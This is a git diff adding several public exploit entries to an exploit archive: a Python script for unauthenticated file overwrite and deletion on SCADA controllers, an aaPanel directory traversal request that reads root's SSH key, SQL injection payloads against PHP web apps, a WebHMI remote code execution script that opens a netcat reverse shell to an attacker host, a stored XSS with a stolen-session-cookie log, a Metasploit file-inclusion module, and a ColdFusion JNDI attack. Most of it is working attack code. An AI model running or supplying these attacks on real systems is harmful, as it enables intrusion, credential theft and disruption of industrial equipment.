diff --git a/exploits/hardware/remote/50783.py b/exploits/hardware/remote/50783.py
new file mode 100755
index 000000000..2314c3b6c
--- /dev/null
+++ b/exploits/hardware/remote/50783.py
@@ -0,0 +1,175 @@
+# Exploit Title: CL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD
+# Exploit Author: LiquidWorm
+
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+#
+#
+# ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD
+#
+#
+# Vendor: Industrial Control Links, Inc.
+# Product web page: http://www.iclinks.com
+# Product datasheet: http://files.iclinks.com/datasheets/Scadaflex%20II/Scadaflex%20SC-1%20&%20SC-2_A1_compressed.pdf
+# Affected version: SW: 1.03.07 (build 317), WebLib: 1.24
+# SW: 1.02.20 (build 286), WebLib: 1.24
+# SW: 1.02.15 (build 286), WebLib: 1.22
+# SW: 1.02.01 (build 229), WebLib: 1.16
+# SW: 1.01.14 (build 172), WebLib: 1.14
+# SW: 1.01.01 (build 2149), WebLib: 1.13
+#
+#
+# Summary: Scadaflex II controllers are 100% web based
+# for both configuration and user interface. No applications
+# are required other than any standard web browser. They
+# are easily supported by remote access over the Internet
+# or a cellular link. Scadaflex II controllers support
+# industry standard wired communications using Modbus,
+# DF1, SNP, and Ethernet IP protocols along with Ethernet-Serial
+# bridging for Modbus or any other protocol. Each Scadaflex
+# II controller has both analog and digital, inputs and
+# outputs, sufficient for pumping stations, irrigation
+# controls, and other similar process monitoring and control
+# applications. They can also serve as communications
+# concentrators and protocol converters that enhance the
+# operation of existing PLCs and process equipment.
+#
+# Desc: The SCADA controller is vulnerable to unauthenticated
+# file write/overwrite and delete vulnerability. This allows
+# an attacker to execute critical file CRUD operations on the
+# device that can potentially allow system access and impact
+# availability.
+#
+# Tested on: SCADA HTTP Server
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# @zeroscience
+#
+#
+# Advisory ID: ZSL-2022-5698
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5698.php
+#
+# CVE ID: CVE-2022-25359
+# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25359
+#
+#
+# 06.11.2021
+#
+
+import time,sys
+import requests
+import datetime
+import showtime
+
+# Default
+# AES Encryption Key = 'ABCD1234abcd:ICL'
+
+def bann():
+ print('''
+----------------------------------------------------------
+ ) ) ) ) ) )
+ ( ( ( ( ( (
+ ) ) ) ) ) )
+ (~~~~~~~~~) (~~~~~~~~~)
+ | t00t | | w00t |
+ | | | |
+ I _._ I _._
+ I /' `\\ I /' `\\
+ I | M | I | J |
+ f | |~~~~~~~~~~~~~~| f | |~~~~~~~~~~~~~~|
+ .' | ||~~~~~~~~| | .' | | |~~~~~~~~| |
+/'______|___||__###___|____|/'_______|____|_|__###___|___|
+
+ ScadaFlex II SCADA Controllers
+ Remote write/delete PoC
+ ZSL-2022-5698
+----------------------------------------------------------
+ ''')
+
+def safe(*trigger, ):
+ return True # |-| Safety Switch
+
+def choice(n):
+ try:
+ if n == 1:
+ overwrite(controllerip = sys.argv[1], filepos = int(sys.argv[3], base = 10))
+ elif n == 2:
+ delete(controllerip = sys.argv[1], filepos = int(sys.argv[2], base = 10))
+ else:
+ print('Usage (Upload): ./sflex.py [IP] [Local file] [File position number]')
+ print('Usage (Delete): ./sflex.py [IP] [File position number]')
+ raise SystemExit('t00t')
+ except Exception as tip:
+ raise SystemExit(tip)
+
+def jump():
+ choice(1) if len(sys.argv) == 4 else next
+ choice(2) if len(sys.argv) == 3 else next
+
+def overwrite(controllerip, filepos):
+ print('Starting script at', start)
+ localfile = sys.argv[2]
+
+ with open(localfile, 'rb') as opener:
+ scadaurl = 'http://'
+ scadaurl += controllerip
+ scadaurl += '/d.php?N'
+ scadaurl += str(filepos)
+ scadaurl += ',73,'
+ scadaurl += opener.name
+ scadaurl += '~'
+ scadaurl += str(int(time.time()))
+
+ see = requests.post(scadaurl, files = {'upload' : opener})
+
+ if '100' in see.text:
+ print('File uploaded in {} directory at position {}.'.format('l', filepos))
+ print('URL: http://' +controllerip+ '/l/' +localfile)
+ else:
+ print("- controller webserver error.")
+ exit()
+
+def delete(controllerip, filepos):
+ print('Starting script at', start)
+ exit(42) if isinstance(filepos, str) else next
+
+ scadaurl = 'http://'
+ scadaurl += controllerip
+ scadaurl += '/rW12IcL_Dat_N'
+ scadaurl += str(filepos)
+ scadaurl += ',0=1~'
+ scadaurl += str(int(time.time()))
+
+ see = requests.get(scadaurl)
+
+ check = '\x72\x57' #|
+ check += '\x31\x32' #|
+ check += '\x49\x63' #|
+ check += '\x4c\x5f' #|
+ check += '\x44\x61' #|
+ check += '\x74\x5f' #|
+ check += '\x4e'# o' #|
+ check += str(filepos)#|
+ check += '\x2c\x30' #|
+ check += '\x09\x52' #|
+
+ if check in see.text:
+ print('File at position {} deleted.'.format(filepos))
+ else:
+ print('- controller webserver error.')
+ exit()
+
+def main():
+ if safe(True):
+ print('Careful...\nSafety: ON')
+ exit(17)
+ else:
+ print('Safety: OFF', end = '')
+ global start
+ start = datetime.datetime.now()
+ start = start.strftime('%d.%m.%Y %H:%M:%S')
+ bann(), jump(), choice(1959)
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/exploits/linux/webapps/50780.txt b/exploits/linux/webapps/50780.txt
new file mode 100644
index 000000000..6ff263267
--- /dev/null
+++ b/exploits/linux/webapps/50780.txt
@@ -0,0 +1,40 @@
+# Exploit Title: aaPanel 6.8.21 - Directory Traversal (Authenticated)
+# Date: 22.02.2022
+# Exploit Author: Fikrat Ghuliev (Ghuliev)
+# Vendor Homepage: https://www.aapanel.com/
+# Software Link: https://www.aapanel.com
+# Version: 6.8.21
+# Tested on: Ubuntu
+
+Application vulnerable to Directory Traversal and attacker can get root user private ssh key(id_rsa)
+
+#Go to App Store
+
+#Click to "install" in any free plugin.
+
+#Change installation script to ../../../root/.ssh/id_rsa
+
+POST /ajax?action=get_lines HTTP/1.1
+Host: IP:7800
+Content-Length: 41
+Accept: */*
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82
+Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: http://IP:7800
+Referer: http://IP:7800/soft
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: aa0775f98350c5c13bfd21f2c6b8c288=d20c4937-e5ae-46fb-b8bd-fa7c290d805a.ohyRHdOIMj3DBfyddCRbL-rlKB0;
+request_token=nKLXa4RUXgwBHeWNyMH1MEDSkTaks9dWjQ7zzA0iRc7lrHwd;
+serverType=nginx; order=id%20desc; memSize=3889; vcodesum=13;
+page_number=20; backup_path=/www/backup; sites_path=/www/wwwroot;
+distribution=ubuntu; serial_no=; pro_end=-1; load_page=null;
+load_type=null; load_search=undefined; force=0; rank=list;
+Path=/www/wwwroot; bt_user_info=; default_dir_path=/www/wwwroot/;
+path_dir_change=/www/wwwroot/
+Connection: close
+
+num=10&filename=../../../root/.ssh/id_rsa
\ No newline at end of file
diff --git a/exploits/php/webapps/50778.txt b/exploits/php/webapps/50778.txt
new file mode 100644
index 000000000..0c01505a3
--- /dev/null
+++ b/exploits/php/webapps/50778.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Simple Real Estate Portal System 1.0 - 'id' SQL Injection
+# Date: 22/02/2022
+# Exploit Author: Mosaaed
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/15184/simple-real-estate-portal-system-phpoop-free-source-code.html
+# Version: 1.0
+# Tested on: Linux mosaaed 5.5.0-1parrot1-amd64 #1 SMP Parrot 5.5.17-1parrot1 (2020-04-25) x86_64 GNU/Linux
+
+
+
+# Sqlmap command:
+
+sqlmap -u "http://localhost/reps/?p=view_estate&id=6" --batch --dbs
+
+# Output:
+
+Parameter: id (GET)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: p=view_estate&id=6' AND 9373=9373 AND 'CcAj'='CcAj
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: p=view_estate&id=6' AND (SELECT 4967 FROM (SELECT(SLEEP(5)))Lowr) AND 'iyVC'='iyVC
+
+ Type: UNION query
+ Title: Generic UNION query (NULL) - 9 columns
+ Payload: p=view_estate&id=-3391' UNION ALL SELECT NULL,CONCAT(0x716b7a7a71,0x6a56556147504d795a536b566c7a4f5659677a65514c706758485a66484f464e5676496470695a41,0x7162767171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
\ No newline at end of file
diff --git a/exploits/php/webapps/50779.txt b/exploits/php/webapps/50779.txt
new file mode 100644
index 000000000..ed52d7e35
--- /dev/null
+++ b/exploits/php/webapps/50779.txt
@@ -0,0 +1,33 @@
+# Title: Air Cargo Management System v1.0 - SQLi
+# Author: nu11secur1ty
+# Date: 02.18.2022
+# Vendor: https://www.sourcecodester.com/users/tips23
+# Software: https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html
+# Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/2022/Air-Cargo-Management-System
+
+# Description:
+The `ref_code` parameter from Air Cargo Management System v1.0 appears
+to be vulnerable to SQL injection attacks.
+The payload '+(select
+load_file('\\\\c5idmpdvfkqycmiqwv299ljz1q7jvej5mtdg44t.https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html\\hag'))+'
+was submitted in the ref_code parameter.
+This payload injects a SQL sub-query that calls MySQL's load_file
+function with a UNC file path that references a URL on an external
+domain.
+The application interacted with that domain, indicating that the
+injected SQL query was executed.
+WARNING: If this is in some external domain, or some subdomain
+redirection, or internal whatever, this will be extremely dangerous!
+Status: CRITICAL
+
+
+[+] Payloads:
+
+---
+Parameter: ref_code (GET)
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: p=trace&ref_code=258044'+(select
+load_file('\\\\c5idmpdvfkqycmiqwv299ljz1q7jvej5mtdg44t.https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html\\hag'))+''
+AND (SELECT 9012 FROM (SELECT(SLEEP(3)))xEdD) AND 'JVki'='JVki
+---
\ No newline at end of file
diff --git a/exploits/php/webapps/50782.txt b/exploits/php/webapps/50782.txt
new file mode 100644
index 000000000..2617defa3
--- /dev/null
+++ b/exploits/php/webapps/50782.txt
@@ -0,0 +1,36 @@
+# Exploit Title: Student Record System 1.0 - 'cid' SQLi (Authenticated)
+# Exploit Author: Mohd. Anees
+# Contact: https://www.linkedin.com/in/aneessecure/
+# Software Homepage: https://phpgurukul.com/student-record-system-php/
+# Version : 1.0
+# Tested on: windows 10 xammp | Kali linux
+# Category: WebApp
+# Google Dork: N/A
+# Date: 22.02.2022
+######## Description ########
+#
+#
+# Authenticate and edit course section where cid parameter will appear and put your payload at there it'll work
+#
+# http://localhost/schoolmanagement/schoolmanagement/pages/edit-course.php?cid=-7%27%20union%20select%201,2,3,4,5--+
+#
+######## Proof of Concept ########
+
+========>>> REQUEST <<<=========
+
+GET /schoolmanagement/pages/edit-course.php?cid=-7%27%20union%20select%201,2,3,4,5--+ HTTP/1.1
+Host: localhost
+sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Windows"
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: none
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: PHPSESSID=m1s7h9jremg0vj7ipkgf9m05n1nt
+Connection: close
\ No newline at end of file
diff --git a/exploits/php/webapps/50784.py b/exploits/php/webapps/50784.py
new file mode 100755
index 000000000..758f47d57
--- /dev/null
+++ b/exploits/php/webapps/50784.py
@@ -0,0 +1,106 @@
+# Exploit Title: WebHMI 4.1.1 - Remote Code Execution (RCE) (Authenticated)
+# Date: 03/01/2022
+# Exploit Author: Antonio Cuomo (arkantolo)
+# Vendor Homepage: https://webhmi.com.ua/en/
+# Version: WebHMI 4.1.1.7662
+# Tested on: WebHMI-4.1.1.7662
+
+#!/usr/bin/python
+import sys
+import re
+import argparse
+import requests
+import time
+import subprocess
+
+print("\nWebHMI 4.1.1 - Remote Code Execution (Authenticated)","\nExploit Author: Antonio Cuomo (Arkantolo)\n")
+print("Level2 account must be enabled !\n");
+
+login = "admin"
+password = "admin"
+
+class Exploit:
+
+ def __init__(self, target_ip, target_port, localhost, localport):
+ self.target_ip = target_ip
+ self.target_port = target_port
+ self.localhost = localhost
+ self.localport = localport
+
+ def exploitation(self):
+ reverse = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f"""
+ payload = ""
+
+ headers_login = {
+ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36',
+ 'Accept': 'application/json, text/javascript, */*; q=0.01',
+ 'Accept-Language': 'en-US,en;q=0.5',
+ 'Accept-Encoding': 'gzip, deflate',
+ 'Content-Type': 'application/json',
+ 'X-WH-LOGIN': login,
+ 'X-WH-PASSWORD': password,
+ 'X-Requested-With': 'XMLHttpRequest',
+ 'Connection': 'close',
+ 'Content-Length': '0'
+ }
+
+ url = 'http://' + target_ip + ':' + target_port
+ r = requests.Session()
+
+ print('[*] Resolving URL...')
+ r1 = r.get(url)
+ time.sleep(3)
+
+ print('[*] Trying to log in...')
+ r2 = r.post(url + '/api/signin', headers=headers_login, allow_redirects=True)
+ time.sleep(3)
+
+ print('[*] Login redirection...')
+ login_cookies = {
+ 'X-WH-SESSION-ID':r2.headers['X-WH-SESSION-ID'],
+ 'X-WH-CHECK-TRIAL':'true',
+ 'il18next':'en',
+ }
+ r3 = r.post(url + '/login.php?sid=' + r2.headers['X-WH-SESSION-ID'] + '&uid=1',cookies=login_cookies)
+ time.sleep(3)
+
+ print('[*] Bypassing basedir...')
+ for i in range(0, len(payload)):
+ #print(payload[i])
+ rp = r.get(url + '/setup/backup.php?sync=`echo%20-n%20"' + payload[i] + '">>cmd.php`', cookies=login_cookies)
+ time.sleep(0.2)
+
+ print('[*] Setting up listener...')
+ listener = subprocess.Popen(["nc", "-nlp", self.localport])
+ time.sleep(2)
+
+ print('[*] Executing payload...')
+ time.sleep(1)
+ print('[*] Waiting reverse shell...')
+ r4 = r.get(url + '/setup/cmd.php?c=`' + reverse + '`.bak', cookies=login_cookies)
+
+ if (r4.status_code == 200):
+ print('[*] Got shell!')
+ while True:
+ listener.wait()
+ else:
+ print('[-] Something went wrong!')
+ listener.terminate()
+
+def get_args():
+ parser = argparse.ArgumentParser(description='WebHMI 4.1.1 - Remote Code Execution (Authenticated)')
+ parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP')
+ parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port')
+ parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP')
+ parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port')
+ args = parser.parse_args()
+ return args
+
+args = get_args()
+target_ip = args.url
+target_port = args.target_port
+localhost = args.localhost
+localport = args.localport
+
+exp = Exploit(target_ip, target_port, localhost, localport)
+exp.exploitation()
\ No newline at end of file
diff --git a/exploits/php/webapps/50785.txt b/exploits/php/webapps/50785.txt
new file mode 100644
index 000000000..ca2e8b85a
--- /dev/null
+++ b/exploits/php/webapps/50785.txt
@@ -0,0 +1,30 @@
+# Exploit Title: WebHMI 4.1 - Stored Cross Site Scripting (XSS) (Authenticated)
+# Date: 04/01/2022
+# Exploit Author: Antonio Cuomo (arkantolo)
+# Vendor Homepage: https://webhmi.com.ua/en/
+# Version: WebHMI Firmware 4.1.1.7662
+# Tested on: WebHMI Firmware 4.1.1.7662
+
+#Steps to Reproduce
+
+1. Login to admin account
+
+2. Add a new register or create new dashboard
+insert payload
+
+
+
+in Title field and save.
+
+# Dashboard section impact instantly all logged users.
+
+#Listener log:
+GET /?PHPSESSID=acaa76374df7418e81460b4a625cb457;%20i18next=en;%20X-WH-SESSION-ID=8a5d6c60bdab0704f32e792bc1d36a6f HTTP/1.1
+Host: 192.168.0.169:8080
+Connection: keep-alive
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
+Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
+Sec-GPC: 1
+Referer: http://192.168.0.153/
+Accept-Encoding: gzip, deflate
+Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7
\ No newline at end of file
diff --git a/exploits/php/webapps/50786.rb b/exploits/php/webapps/50786.rb
new file mode 100755
index 000000000..d39a15068
--- /dev/null
+++ b/exploits/php/webapps/50786.rb
@@ -0,0 +1,245 @@
+# Exploit Title: Microweber CMS v1.2.10 Local File Inclusion (Authenticated)
+# Date: 22.02.2022
+# Exploit Author: Talha Karakumru
+# Vendor Homepage: https://microweber.org/
+# Software Link: https://github.com/microweber/microweber/archive/refs/tags/v1.2.10.zip
+# Version: Microweber CMS v1.2.10
+# Tested on: Microweber CMS v1.2.10
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+ prepend Msf::Exploit::Remote::AutoCheck
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Microweber CMS v1.2.10 Local File Inclusion (Authenticated)',
+ 'Description' => %q{
+ Microweber CMS v1.2.10 has a backup functionality. Upload and download endpoints can be combined to read any file from the filesystem.
+ Upload function may delete the local file if the web service user has access.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [
+ 'Talha Karakumru '
+ ],
+ 'References' => [
+ ['URL', 'https://huntr.dev/bounties/09218d3f-1f6a-48ae-981c-85e86ad5ed8b/']
+ ],
+ 'Notes' => {
+ 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+ 'Reliability' => [ REPEATABLE_SESSION ],
+ 'Stability' => [ OS_RESOURCE_LOSS ]
+ },
+ 'Targets' => [
+ [ 'Microweber v1.2.10', {} ]
+ ],
+ 'Privileged' => true,
+ 'DisclosureDate' => '2022-01-30'
+ )
+ )
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The base path for Microweber', '/']),
+ OptString.new('USERNAME', [true, 'The admin\'s username for Microweber']),
+ OptString.new('PASSWORD', [true, 'The admin\'s password for Microweber']),
+ OptString.new('LOCAL_FILE_PATH', [true, 'The path of the local file.']),
+ OptBool.new('DEFANGED_MODE', [true, 'Run in defanged mode', true])
+ ]
+ )
+ end
+
+ def check
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'admin', 'login')
+ })
+
+ if res.nil?
+ fail_with(Failure::Unreachable, 'Microweber CMS cannot be reached.')
+ end
+
+ print_status 'Checking if it\'s Microweber CMS.'
+
+ if res.code == 200 && !res.body.include?('Microweber')
+ print_error 'Microweber CMS has not been detected.'
+ Exploit::CheckCode::Safe
+ end
+
+ if res.code != 200
+ fail_with(Failure::Unknown, res.body)
+ end
+
+ print_good 'Microweber CMS has been detected.'
+
+ return check_version(res.body)
+ end
+
+ def check_version(res_body)
+ print_status 'Checking Microweber\'s version.'
+
+ begin
+ major, minor, build = res_body[/Version:\s+(\d+\.\d+\.\d+)/].gsub(/Version:\s+/, '').split('.')
+ version = Rex::Version.new("#{major}.#{minor}.#{build}")
+ rescue NoMethodError, TypeError
+ return Exploit::CheckCode::Safe
+ end
+
+ if version == Rex::Version.new('1.2.10')
+ print_good 'Microweber version ' + version.to_s
+ return Exploit::CheckCode::Appears
+ end
+
+ print_error 'Microweber version ' + version.to_s
+
+ if version < Rex::Version.new('1.2.10')
+ print_warning 'The versions that are older than 1.2.10 have not been tested. You can follow the exploitation steps of the official vulnerability report.'
+ return Exploit::CheckCode::Unknown
+ end
+
+ return Exploit::CheckCode::Safe
+ end
+
+ def try_login
+ print_status 'Trying to log in.'
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'keep_cookies' => true,
+ 'uri' => normalize_uri(target_uri.path, 'api', 'user_login'),
+ 'vars_post' => {
+ 'username' => datastore['USERNAME'],
+ 'password' => datastore['PASSWORD'],
+ 'lang' => '',
+ 'where_to' => 'admin_content'
+ }
+ })
+
+ if res.nil?
+ fail_with(Failure::Unreachable, 'Log in request failed.')
+ end
+
+ if res.code != 200
+ fail_with(Failure::Unknown, res.body)
+ end
+
+ json_res = res.get_json_document
+
+ if !json_res['error'].nil? && json_res['error'] == 'Wrong username or password.'
+ fail_with(Failure::BadConfig, 'Wrong username or password.')
+ end
+
+ if !json_res['success'].nil? && json_res['success'] == 'You are logged in'
+ print_good 'You are logged in.'
+ return
+ end
+
+ fail_with(Failure::Unknown, 'An unknown error occurred.')
+ end
+
+ def try_upload
+ print_status 'Uploading ' + datastore['LOCAL_FILE_PATH'] + ' to the backup folder.'
+
+ referer = ''
+ if !datastore['VHOST'].nil? && !datastore['VHOST'].empty?
+ referer = "http#{datastore['SSL'] ? 's' : ''}://#{datastore['VHOST']}/"
+ else
+ referer = full_uri
+ end
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'api', 'BackupV2', 'upload'),
+ 'vars_get' => {
+ 'src' => datastore['LOCAL_FILE_PATH']
+ },
+ 'headers' => {
+ 'Referer' => referer
+ }
+ })
+
+ if res.nil?
+ fail_with(Failure::Unreachable, 'Upload request failed.')
+ end
+
+ if res.code != 200
+ fail_with(Failure::Unknown, res.body)
+ end
+
+ if res.headers['Content-Type'] == 'application/json'
+ json_res = res.get_json_document
+
+ if json_res['success']
+ print_good json_res['success']
+ return
+ end
+
+ fail_with(Failure::Unknown, res.body)
+ end
+
+ fail_with(Failure::BadConfig, 'Either the file cannot be read or the file does not exist.')
+ end
+
+ def try_download
+ filename = datastore['LOCAL_FILE_PATH'].include?('\\') ? datastore['LOCAL_FILE_PATH'].split('\\')[-1] : datastore['LOCAL_FILE_PATH'].split('/')[-1]
+ print_status 'Downloading ' + filename + ' from the backup folder.'
+
+ referer = ''
+ if !datastore['VHOST'].nil? && !datastore['VHOST'].empty?
+ referer = "http#{datastore['SSL'] ? 's' : ''}://#{datastore['VHOST']}/"
+ else
+ referer = full_uri
+ end
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'api', 'BackupV2', 'download'),
+ 'vars_get' => {
+ 'filename' => filename
+ },
+ 'headers' => {
+ 'Referer' => referer
+ }
+ })
+
+ if res.nil?
+ fail_with(Failure::Unreachable, 'Download request failed.')
+ end
+
+ if res.code != 200
+ fail_with(Failure::Unknown, res.body)
+ end
+
+ if res.headers['Content-Type'] == 'application/json'
+ json_res = res.get_json_document
+
+ if json_res['error']
+ fail_with(Failure::Unknown, json_res['error'])
+ return
+ end
+ end
+
+ print_status res.body
+ end
+
+ def run
+ if datastore['DEFANGED_MODE']
+ warning = <<~EOF
+ Triggering this vulnerability may delete the local file if the web service user has the permission.
+ If you want to continue, disable the DEFANGED_MODE.
+ => set DEFANGED_MODE false
+ EOF
+
+ fail_with(Failure::BadConfig, warning)
+ end
+
+ try_login
+ try_upload
+ try_download
+ end
+end
\ No newline at end of file
diff --git a/exploits/windows/remote/50781.txt b/exploits/windows/remote/50781.txt
new file mode 100644
index 000000000..037bf9ba7
--- /dev/null
+++ b/exploits/windows/remote/50781.txt
@@ -0,0 +1,42 @@
+# Exploit Title: Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE)
+# Google Dork: intext:"adobe coldfusion 11"
+# Date: 2022-22-02
+# Exploit Author: Amel BOUZIANE-LEBLOND (https://twitter.com/amellb)
+# Vendor Homepage: https://www.adobe.com/sea/products/coldfusion-family.html
+# Version: Adobe Coldfusion (11.0.03.292866)
+# Tested on: Microsoft Windows Server & Linux
+
+# Description:
+# ColdFusion allows an unauthenticated user to connect to any LDAP server. An attacker can exploit it to achieve remote code execution.
+# JNDI attack via the 'verifyldapserver' parameter on the utils.cfc
+
+==================== 1.Setup rogue-jndi Server ====================
+
+https://github.com/veracode-research/rogue-jndi
+
+
+==================== 2.Preparing the Attack =======================
+
+java -jar target/RogueJndi-1.1.jar --command "touch /tmp/owned" --hostname "attacker_box"
+
+==================== 3.Launch the Attack ==========================
+
+
+http://REDACTED/CFIDE/wizards/common/utils.cfc?method=verifyldapserver&vserver=LDAP_SERVER&vport=LDAP_PORT&vstart=&vusername=&vpassword=&returnformat=json
+
+
+curl -i -s -k -X $'GET' \
+ -H $'Host: target' \
+ --data-binary $'\x0d\x0a\x0d\x0a' \
+ $'http://REDACTED//CFIDE/wizards/common/utils.cfc?method=verifyldapserver&vserver=LDAP_SERVER&vport=LDAP_PORT&vstart=&vusername=&vpassword=&returnformat=json'
+
+
+==================== 4.RCE =======================================
+
+Depend on the target need to compile the rogue-jndi server with JAVA 7 or 8
+Can be done by modify the pom.xml as below
+
+
+7
+7
+
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index fea972e85..9336d3ff4 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -18623,6 +18623,8 @@ id,file,description,date,author,type,platform,port
50720,exploits/windows/remote/50720.py,"Wing FTP Server 4.3.8 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,notcos,remote,windows,
50742,exploits/hardware/remote/50742.txt,"H3C SSL VPN - Username Enumeration",1970-01-01,LiquidWorm,remote,hardware,
50290,exploits/multiple/remote/50290.as,"Adobe Flash Player - Integer Overflow",1970-01-01,ryujin,remote,multiple,
+50781,exploits/windows/remote/50781.txt,"Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE)",1970-01-01,"Amel BOUZIANE-LEBLOND",remote,windows,
+50783,exploits/hardware/remote/50783.py,"ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 - Remote File CRUD",1970-01-01,LiquidWorm,remote,hardware,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@@ -44847,3 +44849,10 @@ id,file,description,date,author,type,platform,port
50772,exploits/php/webapps/50772.py,"WordPress Plugin WP User Frontend 3.5.25 - SQLi (Authenticated)",1970-01-01,"Ron Jost",webapps,php,
50774,exploits/php/webapps/50774.txt,"FileCloud 21.2 - Cross-Site Request Forgery (CSRF)",1970-01-01,"Masashi Fujiwara",webapps,php,
50775,exploits/hardware/webapps/50775.txt,"Dbltek GoIP - Local File Inclusion",1970-01-01,"Valtteri Lehtinen",webapps,hardware,
+50778,exploits/php/webapps/50778.txt,"Simple Real Estate Portal System 1.0 - 'id' SQLi",1970-01-01,Mosaaed,webapps,php,
+50779,exploits/php/webapps/50779.txt,"Air Cargo Management System v1.0 - SQLi",1970-01-01,nu11secur1ty,webapps,php,
+50780,exploits/linux/webapps/50780.txt,"aaPanel 6.8.21 - Directory Traversal (Authenticated)",1970-01-01,Ghuliev,webapps,linux,
+50782,exploits/php/webapps/50782.txt,"Student Record System 1.0 - 'cid' SQLi (Authenticated)",1970-01-01,"Mohd. Anees",webapps,php,
+50784,exploits/php/webapps/50784.py,"WebHMI 4.1.1 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Antonio Cuomo",webapps,php,
+50785,exploits/php/webapps/50785.txt,"WebHMI 4.1 - Stored Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Antonio Cuomo",webapps,php,
+50786,exploits/php/webapps/50786.rb,"Microweber CMS 1.2.10 - Local File Inclusion (Authenticated) (Metasploit)",1970-01-01,"Talha Karakumru",webapps,php,